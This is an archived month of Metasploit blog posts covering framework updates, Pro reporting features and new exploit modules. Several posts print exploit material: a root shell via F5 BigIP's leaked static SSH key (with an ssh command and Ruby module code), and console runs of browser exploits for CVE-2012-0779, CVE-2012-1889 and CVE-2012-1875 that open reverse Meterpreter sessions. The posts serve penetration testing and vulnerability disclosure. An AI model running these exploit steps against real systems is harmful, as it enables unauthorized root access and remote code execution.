Skip navigation
All Places > Metasploit > Blog > 2012 > June
2012

We've been cooking along here in Stately Metasploit Manor, mostly heads-down prepping for BlackHat/Defcon season. (Yes, it's that time of year already). In the meantime, we've a grab bag of mostly post modules, a drive-by update to Meterpreter, and Juan's and sinn3r's most excellent new Flash module.

 

Meterpreter for Visual Studio 2010

 

Meterpreter is the default payload that many of our Windows exploits drop on the target server, and allows for things like unified shell access, file access, etc. If you hack on Meterpreter, you may have noticed with some annoyance that some parts required VC10, while others were only compatible with Visual Studio 2008. This last week, HD Moore took a pass through the Meterpreter source code and upgraded everything required to get Meterpreter compiling on Visual Studio 10. Thanks HD!

 

Collaboration on modules

 

Also this week, contributors Ben Campbell, and Loic Jaquement and David Maloney all independently submitted modules for stealing credentials out of the Windows Group Policy Preference (GPP) XML datastores. This was an unusual circumstance -- most of the time, modules come in with one author, get a little work from sinn3r or me or somebody, and then either get rejected out or land in the main Metasploit branch.

 

In this case, Loic was first with a Meterpreter script that later became a post module. David later submitted a similar module, and finally, Ben came on board with a third. Eventually, we managed to get everyone together on the one module, but I think that if you look at the pull request comment threads, it was a pretty painful process.

 

Looking over the sordid history of this module, it now looks like that someone should have just set up a new public GitHub project for this module. That someone was almost certainly me, so sorry for not jumping on this much sooner. If a side repo was set up and everyone had commit rights to that to collaborate, that almost certainly would have produced better code, faster. That will definitely be the strategy for next time.

 

Better communication along the way could have helped as well. GitHub issues aren't the greatest way to have a long conversations (outside of code critique). For this, a mailing list would have been more appropriate -- and as it happens, I have this lovely metasploit-hackers mailing list right over there on SourceForge. It's set up specifically for Metasploit development chatter, commit commenting, and other security dev nerd talk. It's not intended for regular user Q&A -- for that, stick to the Security Street community here. But, for an archived forum for dev talk, module writers might want to subscribe to metapsloit-hackers to keep abreast of what's new and current in Metasploit dev-land.

 

Flash, RMTP, and You

 

Finally, this week features Juan Vazquez and Wei "sinn3r" Chen's Flash module, complete with a barebones RTMP server. I won't rehash the ripping yarn of that development process here, but will leave it to Juan's blog post from earlier this week.

 

New Modules

 

Finally, here's the list of this week's new modules in our Exploit Database. Thanks to all of our open source contributors for their work on these, especially Loic and Ben for sticking it out for the GPP module.

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

metasploit-architecture-team-collaboration.jpgPenetration testers are not born, they're made, and we all had to start somewhere. So how do you bring new new team members up to speed, mentoring them into a new role? Metasploit users in red teams and consulting organizations often tell me that they like to leverage the Metasploit Pro team collaboration feature for this purpose.

 

Metasploit Pro is accessed through a web interface that is available not only on the local host but also across the network (personal firewall rules permitting). As a result, multiple people can log into the interface at the same time, work on the same project, share sessions, credentials, evidence, and reporting.

 

For example, you can leverage team collaboration for the following cases:

 

  • Mentoring junior team members on a project, where junior team members carry out the easy tasks while senior members carry out advanced tasks
  • Splitting the workload on a large penetration test between team members
  • Leveraging the specialties of team members, for example dividing the workload up into exploiting Windows, Linux, social engineering and bruteforcing

 

This feature is great to use in combination with tagging, which can be used to assign hosts to team members. At the end of a penetration test, reports include all activities.

 

Team collaboration is available to all Metasploit Pro users who have more than one license. To leverage it, simply set up multiple users on your Metasploit Pro machine as follows:

 

  1. Open the menu Administration and select User Administration
  2. Click on New User. If this button is disabled, you either don't have Metasploit Pro or you only have a one-user license. If you purchased more than one user license but the button is disabled in your interface, please email support@rapid7.com and ask to have all user licenses consolidated on one product key.
  3. Set up projects and add the relevant users as authorized users
  4. Have users log in to the web interface from their own machines to collaborate on the projects

 

If you'd like to try out team collaboration, please download the free Metasploit Pro trial, which includes a three-user license for team collaboration.

egypt

Press F5 for root shell

Posted by egypt Employee Jun 25, 2012

As HD mentioned, F5 has been inadvertently shipping a static ssh key that can be used to authenticate as root on many of their BigIP devices. Shortly after the advisory, an anonymous contributor hooked us up with the private key.

 

Getting down to business, here it is in action:

 

    18:42:35 0 exploit(f5_bigip_known_privkey) > exploit

 

    [+] Successful login

    [*] Found shell.

    [*] Command shell session 3 opened ([redacted]:52979 -> [redacted]:22) at 2012-06-22 18:42:43 -0600

 

    id; uname -a

    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

    Linux [redacted] 2.4.21-10.0.1402.0smp #2 SMP Mon Feb 15 10:23:56 PST 2010 i686 athlon i386 GNU/Linux

    ^Z

    Background session 3? [y/N]  y

 

    18:42:35 1 exploit(f5_bigip_known_privkey) >

 

Of course, since it's just a regular ssh key, you can easily just drop it in a file and use a standard ssh client.

 

    ssh -i ~/.ssh/f5-bigip.priv root@8.8.8.8

 

The advantage of using Metasploit to exploit this weakness is in the session management and rapid post-exploitation capabilities that the framework offers.

This bug is also interesting in that it gave us a good test case for using static SSH credentials as an exploit module rather than auxiliary. The key difference between exploit and auxiliary modules is usually the need for a payload. If it needs a payload: exploit. Otherwise, it's auxiliary. In this case it's a little blurry, though, because it results in a session, which is typically an exploit trait. Some of our authentication bruteforce scanners get around this with some ruby acrobatics so they can still create a session despite not having a payload or a handler.

 

From a module developer perspective, this exploit has a few interesting aspects that you won't see elsewhere.

First, and probably most important, it doesn't upload a payload to the victim. The connection itself becomes a shell, so it doesn't need to but that presents a bit of a problem with the framework's design. Fortunately there is a payload for exactly this situation: cmd/unix/interact. This simple payload is different from most; all it does is shunt commands from the user straight to the socket and back. It uses a "find" handler similar to the way a findsock payload works. To tell the framework about the payload and handler this exploit will require, we need a block in the module info like so:

 

    'Payload'     => {
      'Compat'  => {
        'PayloadType'    => 'cmd_interact',
        'ConnectionType' => 'find',
      },
    },

 

Since there is really only one payload that works with this exploit, it also makes sense to set it by default:

 

    'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

 

Next, it uses our modified Net::SSH library to connect to the victim. Most exploits will include Msf::Exploit::Remote::Tcp or one of its descendants; those related mixins all set up the options everyone is familiar with: RHOST, RPORT, etc. Since this one does not, we have to do it manually like so:

 

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22),
      ], self.class

 

Lastly, because the handler is of type "find" we must call handler() to get a session. Most Remote::Tcp exploits don't have to do this if they are not compatible with "find" because the handler will spawn a session whenever a connection is made (either reverse or bind). However, all exploits that *are* compatible with "find" payloads must call handler() at some point. Normally there is a global socket created by the Tcp mixin when you call connect() but in this case it is necessary to let the handler know our socket is now a shell.

 

    def exploit
      conn = do_login("root")
      if conn
        print_good "Successful login"
        handler(conn.lsock)
      end
    end

 

This was a fun module to write. The devices it targets can be a goldmine for a pentester who likes packets since they're basically a giant packet sink that lets you read and modify traffic willy nilly. ARP spoofing is noisy and DNS poisoning is hard, let's just own the firewall.

Ever since the first sightings of a new zero-day attack (CVE-2012-0779) on Adobe Flash last month, the exact path of exploitation has been somewhat of a mystery. The attacks were specifically targeted against defense contractors and other victims as part of a spear phishing attack, and included a Word document with a Flash (SWF) object. The infected machines were observed to contacting malicious servers in China, Korea, and the United States. While the vulnerability has since been patched by Adobe, we were interested in how the exploit worked so we could add an exploit module to Metasploit, which enables organizations to verify if they are vulnerable to an attack.

 

Though the malware's behavior is well-documented, there was little information on the trigger, which is the method to create an application crash associated with the vulnerability. By the time most researchers read about the attack, the crucial clue revealing the trigger -- the Real Time Messaging Protocol (RTMP) server -- was already offline.

 

Here is our story of how we researched this exploit:

 

Initially, we found a sample of the malware, and starting analyzing the SWF (Shockwave File). We found the SWF's spray, a software exploitation technique that allows the attacker to manipulate the application's memory allocations, which can be used to control a specific region of memory, and then gain code execution when a crash occurs. The SWF also had a payload, which takes control over the computer once compromised, and an RTMP communication attempt... but we found no trigger. After some more digging, we concluded the vulnerability is most likely due to the handling of AMF (Action Message Format) messages with RTMP (comments quoted from Adobe ActionScript 3.0 Reference for the Adobe Flash Platform):

 

public function v42(_arg1:String):void{
  // The NetConnection class creates a two-way connection
  // between a client and a server. The client can be a Flash
  // Player or AIR application. The server can be a web server,
  //Flash Media Server, an application server running Flash Remoting, or the Adobe Stratus service
    this.v15 = new NetConnection();


  var _local2 = "rtmp://";
  var _local3 = "/TSGeneralSetting";
  var _local4:String = ((_local2 + _arg1) + _local3);


  // Creates a two-way connection to an application on Flash Media Server or to Flash Remoting, or creates a two-way
  // network endpoint for RTMFP peer-to-peer group communication
  this.v15.connect(_local4);


  // Calls a command or method on Flash Media Server or on an application server running Flash Remoting
    this.v15.call("systemMemoryCall", this.v16, "argc");
}











Not having access to a malicious RTMP server, we set up our own Flash Media Server, and inspected the intended communication:rtmp_connection.png

Our first guess was that the trigger was related to the parsing of the systemMemoryCall() response. But our RTMP server didn't recognize this function call, and returned an AMF error message. Since we didn't have the original trigger RTMP server, the trail went cold, and eventually we decided to move on to other things.


This part is also where other researchers stop their analysis and gave up.


Thankfully, we got our hands on a PCAP that captured the RTMP communication between an infected machine vs the actual RTMP server. First thing we did was comparing the legit "systemMemorycall" response from a Flash Media Server with the malicious one:


error_messages.png


In the case of the "_error" response from the malicious RTMP server, it is definitely malformed according to the RTMP specification from Adobe, which should look like this:


Field NameType
Description
Command NameString_error indicates an error
Transaction IDNumberTransaction ID
InformationObjectName-value pairs that describe the response from|the server ‘code’, ‘level’, ‘description’ are names of few.


After playing with the RTMP "_error" response, we were finally able to trigger an exploitable crash from Adobe Flash:



(348.540): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000

eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0         nv up ei pl nz na po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202

Flash32_11_2_202_228!DllUnregisterServer+0x300e84:

104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]

ds:0023:44444470=????????

 

0:000> u eip

Flash32_11_2_202_228!DllUnregisterServer+0x300e84:

104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]

104b1b30 53              push    ebx

104b1b31 ffd0            call    eax


Because the type confusion is triggered when handling malformed RTMP _error messages, you don't need to wait for the systemMemoryCall() request. Instead, a malicious RTMP server can just return a crafted "_error" to a "connect" RTMP command (according to the RTMP specification). This made it much easier to build the Metasploit module.


While Metasploit supports a variety of mixins for many different protocols, none existed for RTMP, so we built one using the "Rex::Socket::TcpServer" API -- just enough to talk RTMP with the client, delivering the protocol handshake and serving the malicious _error response messages for "connect" requests.


After completing our exploit voodoo ritual, we present to you this new Metasploit module for CVE-2012-0779, which works on Internet Explorer 6, 7 and 8 (with DEP bypass) on Windows XP SP3:



msf > use exploit/windows/browser/adobe_flash_rtmp

msf  exploit(adobe_flash_rtmp) > exploit

[*] Exploit running as background job.

 

[*] Started reverse handler on 192.168.1.157:4444

[*] Using URL: http://0.0.0.0:8080/Sgs7eu3zjBo0

[*]  Local IP: http://192.168.1.157:8080/Sgs7eu3zjBo0

[*] Server started.

msf  exploit(adobe_flash_rtmp) > [*] 192.168.1.158    adobe_flash_rtmp - Client requesting: /Sgs7eu3zjBo0

[*] 192.168.1.158    adobe_flash_rtmp - Using msvcrt ROP

[*] 192.168.1.158    adobe_flash_rtmp - Sending html

[*] 192.168.1.158    adobe_flash_rtmp - Client requesting: /Sgs7eu3zjBo0/BnKXAzRw.swf

[*] 192.168.1.158    adobe_flash_rtmp - Sending Exploit SWF

[*] 192.168.1.158    adobe_flash_rtmp - Connected to RTMP

[*] Sending stage (752128 bytes) to 192.168.1.158

[*] Meterpreter session 1 opened (192.168.1.157:4444 -> 192.168.1.158:1840) at 2012-06-22 11:11:16 +0200

[*] Session ID 1 (192.168.1.157:4444 -> 192.168.1.158:1840) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: iexplore.exe (2284)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 3904

[+] Successfully migrated to process

 

If you would like to try out this new module, get your free Metasploit download now or update your existing installation.

 

sinn3r & juan

This week's release sees a quiet vulnerability fix, an exploit against an unpatched vulnerability in Microsoft's XML Core Services, and some helpful new/old commands, as well as the usual pile of exploity goodness you've come to expect from the Metasploit kitchen.

 

Vulnerabilities? In My Metasploit?

 

It's more likely than you think. Like all reasonably complex software packages, Metasploit occasionally ships with security vulnerabilities. Lucky for us, our user base tends to be pretty sophisticated when it comes to discovering and reporting vulns in our product, so these bugs are usually pretty short-lived. This week, Borja Merino discovered one, reported it in over the weekend, and we rolled an emergency fix out that day.


If you have a security vulnerability in Metasploit, I would be super-grateful if you reported it to security@metasploit.com so that we can roll out a fix. Here at Metasploit we stick to a 60-day disclosure policy for vulnerabilities that we discover independently, so we'd appreciate the heads-up the next time a Metasploit vuln surfaces. In return, we'll be sure you get credited with discovery and all that.

 

Speaking of Zero-Day...

 

This release contains a module for an unpatched vulnerability in Microsoft's XML Core Services. The module exercises the vuln via Internet Explorer, and is currently unpatched. For more details on that, see Wei "sinn3r" Chen's blog post from earlier this week. For tips on how to avoid getting exploited out on the wild Internet, keep an eye on Microsoft's Security Advisory 2719615. In the mean time, the Metasploit module appears to be the best way to test your exposure, given whatever mitigation you settle on while waiting for a patch.

 

Deprecated Commands

 

This week, Metapsloit core developer James "egyp7" Lee tackled a persistent problem we've been having on the IRC channel -- people who have read Metasploit: The Penetration Tester's Guide and who subsequently notice that commands like db_host are no longer functional. Egypt has instituted a deprecated commands system for msfconsole now, so users who try db_hosts, db_services, etc. get a helpful redirect to the correct "hosts" or "services" command. In addition, since it's been about eight months since db_autopwn was deprecated out and people still ask about it, we suspect that's floating around in documentation as well -- so that command gives a helpful link to HD Moore's blog post, Six Ways to Automate Metasploit.

 

New Modules

 

Finally, here's the list of this week's new modules. Thanks to all of our open source contributors for their work on these.

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

PCI Report Metasploit.jpgPCI DSS Requirement 11.3 requires that you "perform penetration testing at least once a year, and after any significant infrastructure or application upgrade or modification". You can either conduct this PCI penetration test in-house or hire a third-party security assessment. Metasploit Pro offers a PCI reporting template, which helps you in both of those cases. If you are conducting the penetration test in-house, it helps you document compliance to your QSA. If you are hiring a third-party penetration tester, Metasploit Pro can help you assess the security of your environment in advance so you pass your audit.

 

Metasploit Pro tests for and reports on these PCI requirements:

 

  • PCI Requirement 2.2.1: Implement only one primary function per server to prevent functions that require different security levels from co-existing on the same server. (For example, web servers, database servers, and DNS should be implemented on separate servers.)
  • PCI Requirement 2.3: Encrypt all non-console administrative access such as browser/Web-based management tools.
  • PCI Requirement 6.1: Ensure that all system components and software have the latest vendor-supplied security patches installed. Deploy critical patches within a month of release.
  • PCI Requirement 8.2: Employ at least one of these to authenticate all users: password or passphrase; or two-factor authentication (e.g., token devices, smart cards, biometrics, public keys).
  • PCI Requirement 8.4: Render all passwords unreadable for all system components both in storage and during transmission using strong cryptography based on approved standards.
  • PCI Requirement 8.5: Ensure proper user authentication and password management for non-consumer users and administrators on all system components.
  • PCI Requirement 8.5.8: Do not use group, shared, or generic accounts and passwords, or other authentication methods.
  • PCI Requirement 8.5.10: Require a minimum password length of at least seven characters.
  • PCI Requirement 8.5.11: Use passwords containing both numeric and alphabetic characters.

 

Attached, you'll find a sample Metasploit PCI DSS report. To test the software in your environment, download Metasploit now.

We've been noticing a lot of exploit activities against Microsoft vulnerabilities lately. We decided to look into some of these attacks, and released two modules for CVE-2012-1889 and CVE-2012-1875 within a week of the vulnerabilities' publication for our users to test their systems. Please note that both are very important to any organization using Windows, because one of them is a newly patched bug, while the other is still a zero-day. To test if any systems on your network are vulnerable, you can download the latest version of Metasploit for free.

 

CVE-2012-1889: MSXML Uninitialized Memory Corruption

 

This is an uninitialized memory bug found in MSXML. According to Microsoft, such a component can be loaded from either Internet Explorer and Microsoft Office. This vulnerability is rumored to be "state-sponsored", and what makes it really critical is it's still an 0-day hijacking Gmail accounts. That's right, that means if you're using Gmail as well as Internet Explorer or Microsoft Office, you're at risk. We expect this vulnerability to grow even more dangerous since there's no patch, and it's rather easy to trigger. There is a temporary mitigation from Microsoft by disabling the component and other config tweaks, but obviously, that has its limitations. Your best bet may be to use a different browser such as Google Chrome until an official patch is available.

 

Jun 19th, 2012 Update: This module now works for IE6/7/8/9, Windows XP, Vista, and all the way to Windows 7 SP1.

July 10th, 2012 Update: Patch is now available.

 

Here's how you can check with Metasploit if any systems on your network are vulnerable, which is very likely since there is no patch available yet:

 

msf > use exploit/windows/browser/msxml_get_definition_code_exec

msf  exploit(msxml_get_definition_code_exec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(msxml_get_definition_code_exec) > set lhost 10.0.1.3

lhost => 10.0.1.3

msf  exploit(msxml_get_definition_code_exec) > exploit

[*] Exploit running as background job.

 

[*] Started reverse handler on 10.0.1.3:4444

[*] Using URL: http://0.0.0.0:8080/xtQdbEC7QDIb

msf  exploit(msxml_get_definition_code_exec) >

[*]  Local IP: http://10.0.1.3:8080/xtQdbEC7QDIb

[*] Server started.

[*] 10.0.1.79        msxml_get_definition_code_exec - Using msvcrt ROP

[*] 10.0.1.79        msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html

[*] Sending stage (752128 bytes) to 10.0.1.79

[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.79:1565) at 2012-06-18 14:07:38 -0500

[*] Session ID 2 (10.0.1.3:4444 -> 10.0.1.79:1565) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: iexplore.exe (2856)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 2356

[+] Successfully migrated to process

 

CVE-2012-1875: Internet Explorer Same ID Use-After-Free

 

This is a vulnerability found in the way Internet Explorer handles the same ID property, which accesses a deleted object and results in remote code execution. This has been exploited in the wild, possibly originating from Hong Kong. According to AlienVault Labs, the command-and-control server (C&C) is still active at the time of this writing. The Metasploit module shares some similarities with the one found in the wild -- they both bypass DEP/ASLR, use msvcr71.dll, and they both target common systems such as Windows XP and Windows 7. Multiple anti-virus vendors already have a quick check for this exploit. However, AVs cannot be used to patch bugs, so we still recommend you to try the Metasploit module anyway to verify if you are still indeed vulnerable.

 

To use this module, simply do the following:

 

msf > use exploit/windows/browser/ms12_037_same_id

msf  exploit(ms12_037_same_id) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(ms12_037_same_id) > set lhost 10.0.1.3

lhost => 10.0.1.3

msf  exploit(ms12_037_same_id) > exploit

[*] Exploit running as background job.

 

[*] Started reverse handler on 10.0.1.3:4444

[*] Using URL: http://0.0.0.0:8080/gTHJEKBboMi

 

[*]  Local IP: http://10.0.1.3:8080/gTHJEKBboMi

[*] Server started.

msf  exploit(ms12_037_same_id) >

[*] 10.0.1.79        ms12_037_same_id - Client requesting: /gTHJEKBboMi

[*] 10.0.1.79        ms12_037_same_id - Using msvcrt ROP

[*] 10.0.1.79        ms12_037_same_id - Sending html

[*] Sending stage (752128 bytes) to 10.0.1.79

[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.79:1685) at 2012-06-18 13:42:49 -0500

[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.79:1685) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: iexplore.exe (3916)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 1680

[+] Successfully migrated to process

 

If you have any questions, let us know in the comments section.  To obtain the latest version of Metasploit for free, please go to: http://www.metasploit.com/download/

This video shows Metasploit Community Edition being used to run an nmap scan on a Virtual Box network in order to discover hosts.

 

This video covers the basics of launching exploits from Metasploit Community Edition. The exploits were discovered in a previous step both with Nexpose and Nessus. In the case of Nessus the results were exported as a .Nessus file then imported into Metasploit Community Edition. This video picks up right after the vulnerabilities are discovered and imported.

 

nmap reporting is excellent with the XML option but this is not used in a lot of cases. The XML output from nmap can be imported into other tools such as the Metasploit Community Edition (Import button), metasploit DB, and other tools. Also, the XML format can be opened in a web browser to produce a well-formatted report suitible for attachment to a pen-test.

 

This video covers accessing a web site that is normally unreachable from our Backtrack 5 box. However, after gaining a session on a third box, we forward our web browser through the compromised host in order to browse the website. The port forwarding is done via a meterpreter session on the compromised host. After setting up the port forward, the browser is able to use the compromised host as a relay (almost like a web proxy) in order to browse to the "internal" web application.

 

In previous versions of Metasploit it was possible to run "db_autopwn -t -x" in the msfcomsole in order to have metasploit guess the best exploits for a given vulnerability.

 

This video looks at alternative functionality for the depreciated "db_autopwn -t -x" option in older versions of Metasploit's msfconsole. Metasploit Community Edition has similar exploit analysis functionality accessible via the web based GUI.

 

This video shows how to have the hashdump post exploitation module automatically populate the creds table in the metasploit database, then export the credentials to a file suitible to pass to the john the ripper tool in order to audit the passwords.

 

Hu

This video covers importing the completed Nessus scan into Metasploit Community Edition.

 

When it rains, it pours. We released Metasploitable Version 2 , published a technique for scanning vulnerable F5 gear , and put out a module to exploit MySQL's tragically comic authentication bypass problem, all in addition to cooking up this week's update. So, kind of a busy week around here. You're welcome. (:

 

Encrypted Java Meterpreter

 

This week's update features Michael Schierl's much anticipated cryptographic update to Java Meterpreter. Now, when using the default Java Meterpreter payload, users can specify an "AESPassword" option, which will encrypt all post-exploit communication with the Java Meterpreter payload. To illustrate, post-exploitation packet captures will go from this, to this.

 

This should make life a little more challenging for our IDS/IPS signature writing friends, and make Java Meterpreter sessions a little more reliable for penetration testers.

 

Once we've kicked this new encryption mode around for a couple weeks and make sure everything's copacetic there, I expect to have this option enabled by default for Java exploits.

 

Ye Olde Tyme Vulnerabilitys

 

This week's update also features something old -- specifically, open source contributor Patrick's modules for Microsoft Data Access Components (MDAC) vulnerabilites from yesteryear. Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow and Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution both target older IIS installations - issues MS02-065 and MS98-004, respectively. Veteran penetration testers will recognize these Microsoft bulletin numbers from countless vulnerability reports. Just seeing MS98-004 mentioned in a new module makes me misty for the old days.

 

Having exploits handy for older vulnerabilities like this can be hugely useful. While it might be a foregone conclusion today that there is no way to secure a given NT 4.0 machine effectively, these modules make it much easier to actually prove it to your client.

 

Other New Modules

 

Finally, we have a slew of new modules -- thanks again to our community of open source security contributors for the diverse set of exploits this week.

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

hdmoore

Introducing Metasploitable 2!

Posted by hdmoore Jun 13, 2012

Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. Unlike other vulnerable virtual machines, Metasploitable focuses on vulnerabilities at the operating system and network services layer instead of custom, vulnerable applications. I am happy to announce the release of Metasploitable 2, an even better punching bag for security tools like Metasploit, and a great way to practice exploiting vulnerabilities that you might find in a production environment.

 

For download links and a walkthrough of some of the vulnerabilities (and how to exploit them), please take a look at the Metasploitable 2 Exploitability Guide.

 

Have fun!

 

-HD

Metasploit-custom-reports.jpgMetasploit Pro has a powerful reporting engine with many standard reports but also great ways to build your own reports. Custom reports can help you if in a couple of different ways:

 

  • Add your logo and corporate design to reports
  • Change the way reports display the information
  • Translate a reporting template to your local language
  • Create new reports for regional compliance needs

 

A custom report is a report that you use template to generate. You can generate a custom report with a template that you created or with a Metasploit Pro custom template.

 

Metasploit Pro provides default JRXML templates that you can use to customize a template. The templates include a default template and a simple template. To build a custom template, you should download a Metasploit Pro template and use the template as a starting point for the custom template.

 

To customize a report template, you must be familiar with Jasper iReports, JasperReports, XML, Java, and SQL.

 

JasperReports

 

JasperReports is an open source Java based reporting engine, or library, that Metasploit Pro uses to generate standard and custom reports. Metasploit Pro builds reports with the JasperReports reporting format, JRXML.

 

How JasperReports Works

 

JasperReports operates similarly to a compiler. You create a JRXML file, which defines the instructions that determine where the report places text, puts images, and retrieves data. The Jasper compiler compiles the JRXML file to generate a report. After you have a compiled report, the Jasper engine accesses the data source to pull data for the report. The combination of the data source and a Jasper report enable you to product an actual report in PDF, HTML, RTF, and Word.

 

For more information on JasperReports, visit http://jasperforge.org/projects/jasperreports.

 

Jasper iReport

 

If you want to easily create a custom report template, you can use a GUI based program like Jasper iReport to design the layout and appearance of the template. Jasper iReport is the open source report designer that is available from JasperReports. With Jasper iReport, you can visually design reports without knowledge of the JasperReports library, XML, and Java. The easiest way to create a custom template is to use the simple template that is available in Metasploit Pro as a starting point. The simple template uses Jasper iReport’s default template and uses a single SQL query to create a table of host machines and a count of the services and vulnerabilities that are available for each host.

 

Data Source Parameters

 

You can use data source parameters to define SQL queries to a database. The SQL queries that you define determine the data that displays in the report. To build a report template, you must include the workspace_id parameter. The workspace_id parameter populates the report with data that is relevant for the current project.

 

In iReport, when you define the query that the report engine uses to retrieve the database fields, you must pass the workspace_id parameter as part of a WHERE clause in the SQL statement that populates the data source. For example, you can enter SELECT * FROM hosts WHERE workspace_id = $P{workspace_id} to select the discovered hosts for a  specific project.

 

Downloading the Simple or Default Template

 

  1. Open a project.
  2. Click the Reports tab. The Reports window appears.
  3. Click on the Download Default Template or Download Simple Template download links below the Saved Reports and Data Exports area.
  4. Save the template to a location on your computer.

 

Uploading a Custom Template

 

The custom template must have a JRXML, or Jasper file, extension.

 

  1. Open a project.
  2. Click the Reports tab. The Reports window appears.
  3. Click Upload Custom Report Collateral.
  4. Browse to the location of the custom report template and select the template. Click Open.
  5. Enter a descriptive name for the template.
  6. Upload the template. The template appears under the Custom Templates and Logos area. You can choose the template when you create a custom report.

 

Uploading a Logo for Custom Reports

 

You can upload a logo to a project. The logos that you upload are globally available for you to add to any report that you generate within the project.

 

  1. Open a project.
  2. Select the Reports tab. The Reports window appears.
  3. Click Custom Report. The New Custom Report window appears.
  4. Click Upload Custom Report Collateral. 96
  5. Click Browse and locate the logo file that you want to upload. Metasploit Pro supports GIF, JPEG, JPG, and PNG files.
  6. Enter a name for the file.
  7. Upload the file. The file appears under the Custom Templates and Logos area.

 

You can choose the logo file when you create a custom report.

 

Adding a Logo to a Custom Report

 

You can add a custom logo to a report. The custom logo that you use replaces the default Rapid7 logo on the cover page and footer of the report.

 

  1. Open a project.
  2. Select the Reports tab. The Reports window appears.
  3. Click Custom Report. The New Custom Report window appears.
  4. Choose a custom report format. You can choose PDF, Word, RTF, or HTML to generate the report.
  5. Enter a name for the report. You can enter up to 63 characters and use alphanumeric characters, dashes, hyphens, periods, and spaces.
  6. Specify the hosts that you want the report to include and exclude.
  7. Click the Custom report logo dropdown and select the logo that you want to use.
  8. Select the report sections that you want to include in the report.
  9. Choose if you want to include detailed information for each session action.
  10. Choose if you want to include charts and graphs in the report.
  11. Generate the report. All generated reports appear under the Saved Reports and Data Exports area.

 

Creating a Custom Report

 

Before you can create a custom report, you must upload a custom template to Metasploit Pro. Additionally, if you want to include a logo in the report, you must upload the GIF, JPEG, JPG, or PNG file for the image.

 

  1. Open a project.
  2. Select the Reports tab. The Reports window appears.
  3. Click Custom Report. The New Custom Report window appears.
  4. Choose a custom report format. You can choose PDF, Word, RTF, or HTML to generate the report.
  5. Enter a name for the report. You can enter up to 63 characters and use alphanumeric characters, dashes, hyphens, periods, and spaces.
  6. Specify the hosts that you want the report to include and exclude.
  7. Choose the custom report template that you want to use to generate the report.
  8. Select the report sections that you want to include in the report.
  9. Choose if you want to include detailed information for each session action.
  10. Choose if you want to include charts and graphs in the report.
  11. Generate the report. All generated reports appear under the Saved Reports and Data Exports area

 

If you'd like to try customizing your reports, download Metasploit and start your free trial of Metasploit Pro.

This morning Matta Consulting posted an advisory for the F5 BigIP equipment. The advisory states that certain BigIP devices contain a SSH private key on its filesystem that is trusted for remote root access on every other BigIP appliance. Although Matta did not provide the private key, they did provide the public key itself:

 

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogkYFrcW8OK4VJ T+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4ndz39L5Ds1n7Si1m2suUNxWbK v58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk= SCCP Superuser


F5 has published a patch for this issue, but you can bet that many users will be unaware of the issue , and even those that are aware may not want to take down their load balancer to apply it( applying the fix does not result in any downtime as stated in the comments below ). The private key is likely still on a large number of production appliances and any attacker with the access to a virtual or physical appliance can extract the key.


A quick review of my personal research project's data shows that it identified 7701 BigIP systems of which 3409 of them have SSH open to the world. If this trend is representative (and it should be via random IP sampling), this puts the overall exposure at 43% of all F5 BigIP systems.Note that this sampling was for devices running Apache with the following string in the default page: "F5 Networks Configuration Utility" (not devices with a Server banner of BigIP, which had a much lower rate of SSH exposure).


One nifty feature within Metasploit is the ability to "half-scan" SSH servers with only the public key. This will tell us whether the server would accept authentication with that key, even if we do not possess the corresponding private  key. This is a great way to ensure that a terminated employee's keys have been removed from your network and check for backdoor keys such as the one introduced accidentally by F5. We can use the public key from this advisory with the ssh_identify_pubkeys module to quickly identify any F5 equipment with this insecure key still in place. Once we get a copy of the private key, this will be used to add a full-on exploit module to Metasploit.


